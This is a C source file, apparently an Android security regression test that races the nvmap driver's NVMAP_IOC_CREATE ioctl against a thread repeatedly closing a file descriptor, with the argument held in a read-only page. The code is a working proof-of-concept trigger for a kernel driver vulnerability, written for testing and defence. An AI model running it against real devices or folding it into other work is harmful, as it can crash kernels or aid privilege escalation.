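/*
 * Copyright (C) 2017 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define _GNU_SOURCE

/*
 * Regression test that stresses the nvmap driver's NVMAP_IOC_CREATE path.
 *
 * What the code does:
 *   - main() pins itself to one CPU, opens /dev/nvmap and places the ioctl
 *     argument structure in a page that is then made read-only;
 *   - race_thread(), pinned to another CPU, repeatedly closes descriptor
 *     number RACE_FD once it has been signalled;
 *   - main() then issues NVMAP_IOC_CREATE in an endless loop.
 *
 * NVMAP_IOC_CREATE is declared _IOWR and the structure has a "returns nvmap
 * handle" field, so the driver presumably writes a result back into the
 * (read-only) argument; which driver code path this reaches is not visible
 * here -- confirm against the advisory this test was written for.
 *
 * Neither loop ever terminates, so the surrounding harness presumably stops
 * the process with a timeout. For whoever triages a run: a setup failure
 * (device node missing, allocation or mprotect failure, thread creation
 * failure) means the driver was not exercised as intended, so the run says
 * nothing about the driver; the diagnostics printed below make that case
 * distinguishable.
 */

/*
 * NOTE(review): the header names were lost from this copy of the file (only
 * bare "#include" directives survived). The list below is reconstructed from
 * the symbols the code uses -- confirm against the original source.
 */
#include <errno.h>
#include <fcntl.h>
#include <malloc.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/types.h>

#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

/*
 * NVMAP_HEAP_IOVMM is not defined anywhere in this file. The macro below is
 * never expanded here, so the missing definition does not affect compilation.
 */
#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)

/* Local constants used by the test itself (not part of the driver ABI). */
enum {
    TEST_PAGE_SIZE = 0x1000, /* alignment and protection granule used below */
    RACE_FD = 1024           /* descriptor number closed by race_thread() */
};

struct nvmap_handle_param {
    __u32 handle;           /* nvmap handle */
    __u32 param;            /* size/align/base/heap etc. */
    unsigned long result;   /* returns requested info*/
};

struct nvmap_create_handle {
    union {
        __u32 id;           /* FromId */
        __u32 size;         /* CreateHandle */
        __s32 fd;           /* DmaBufFd or FromFd */
    };
    __u32 handle;           /* returns nvmap handle */
};

struct nvmap_alloc_handle {
    __u32 handle;           /* nvmap handle */
    __u32 heap_mask;        /* heaps to allocate from */
    __u32 flags;            /* wb/wc/uc/iwb etc. */
    __u32 align;            /* min alignment necessary */
};

#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM   _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE    _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC   _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)

/* Descriptor for /dev/nvmap; -1 until open_driver() succeeds. */
int g_fd = -1;

/* Used once, to release race_thread() from main(). */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

/* ioctl argument for NVMAP_IOC_CREATE; set up by prepare_data(). */
struct nvmap_create_handle* g_allocation = NULL;
/* ioctl argument for NVMAP_IOC_FROM_FD. */
struct nvmap_create_handle g_allocation_dup;

/**
 * Open the nvmap device node read/write and remember it in g_fd.
 *
 * @return the descriptor on success, a negative value on failure (the
 *         outcome is also printed, with errno on failure).
 */
int open_driver()
{
    const char *dev_path = "/dev/nvmap";

    g_fd = open(dev_path, O_RDWR);
    if (g_fd < 0) {
        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
    } else {
        printf("[*] open file(%s) succ!\n", dev_path);
    }
    return g_fd;
}

/**
 * Issue NVMAP_IOC_CREATE with g_allocation as the argument.
 *
 * The ioctl result is deliberately ignored: the caller runs this in a tight
 * loop and only the driver-side behaviour matters to the test.
 */
void trigger_nvmap_create()
{
    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
}

/**
 * Issue NVMAP_IOC_FROM_FD for @fd using g_allocation_dup as the argument.
 * Not called from main() in this file.
 */
void trigger_nvmap_create_dup(int fd)
{
    g_allocation_dup.fd = fd;
    ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
}

/**
 * Issue NVMAP_IOC_ALLOC for the handle currently stored in g_allocation,
 * requesting zeroed pages from the generic carveout heap.
 * Not called from main() in this file.
 */
void trigger_nvmap_alloc()
{
    struct nvmap_alloc_handle alloc = {0};

    alloc.align = 0x1000;
    alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    alloc.handle = g_allocation->handle;
    ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
}

/**
 * Issue NVMAP_IOC_FREE, passing @fd as the ioctl argument value.
 * Not called from main() in this file.
 */
void trigger_nvmap_free(int fd)
{
    ioctl(g_fd, NVMAP_IOC_FREE, fd);
}

/**
 * Set the calling thread's nice value and CPU affinity.
 *
 * @param privi     nice value handed to setpriority().
 * @param cpu_mask  raw affinity bitmask handed to sched_setaffinity().
 *
 * Both calls are best effort: a failure is reported and the test goes on.
 * The original code swallowed the sched_setaffinity() failure in an empty
 * branch, which hid the fact that the two threads might then share a CPU.
 */
void setup_privi_and_affinity(int privi, unsigned long cpu_mask)
{
    if (setpriority(PRIO_PROCESS, gettid(), privi) < 0) {
        printf("[*] setpriority(%d) failed, errno=%d\n", privi, errno);
    }

    /* bind process to a CPU */
    if (sched_setaffinity(gettid(), sizeof(cpu_mask), (void *)&cpu_mask) < 0) {
        printf("[*] sched_setaffinity(0x%lx) failed, errno=%d\n",
               cpu_mask, errno);
    }
}

/**
 * Allocate the ioctl argument and make its first page read-only.
 *
 * On allocation failure g_allocation is left NULL and the caller must not
 * continue. The mprotect() outcome is printed with the errno of that call
 * (0 on success) instead of whatever errno happened to hold beforehand.
 */
void prepare_data()
{
    void *data = memalign(TEST_PAGE_SIZE, 4 * TEST_PAGE_SIZE);

    if (data == NULL) {
        printf("[*] memalign failed, errno=%d\n", errno);
        return;
    }
    printf("[*] data = %p\n", data);

    g_allocation = (struct nvmap_create_handle *)data;
    g_allocation->size = 1024;
    g_allocation->handle = -1;

    /* From here on the argument structure can be read but not written. */
    int prot_err = 0;
    if (mprotect(data, TEST_PAGE_SIZE, PROT_READ) != 0) {
        prot_err = errno;
    }
    printf("[*] mprotect, error = %d\n", prot_err);
}

/**
 * Second thread: waits once on the condition variable (no predicate is
 * checked), then closes descriptor RACE_FD in an endless loop.
 *
 * Never returns; @arg is unused.
 */
void* race_thread(void* arg)
{
    (void)arg;

    setup_privi_and_affinity(-10, 2);

    pthread_mutex_lock(&mutex);
    pthread_cond_wait(&cond, &mutex);
    pthread_mutex_unlock(&mutex);

    while (1) {
        close(RACE_FD);
    }
}

/**
 * Test entry point.
 *
 * @return -1 when setup fails (device node cannot be opened, the argument
 *         buffer cannot be allocated, or the second thread cannot be
 *         started). Otherwise it never returns: it loops on
 *         NVMAP_IOC_CREATE until the process is stopped from outside.
 */
int main(int argc, char**argv)
{
    (void)argc;
    (void)argv;

    setup_privi_and_affinity(-10, 1);

    if (open_driver() < 0) {
        return -1;
    }

    prepare_data();
    if (g_allocation == NULL) {
        /* Nothing to pass to the ioctl; the original would have crashed
         * on a NULL dereference inside prepare_data() instead. */
        return -1;
    }

    pthread_t tid;
    int rc = pthread_create(&tid, NULL, race_thread, NULL);
    if (rc != 0) {
        printf("[*] pthread_create failed, error=%d\n", rc);
        return -1;
    }

    /* Give the second thread time to reach pthread_cond_wait(). */
    usleep(100 * 1000);
    pthread_cond_signal(&cond);
    usleep(20);

    while (1) {
        trigger_nvmap_create();
    }
    return 0;
}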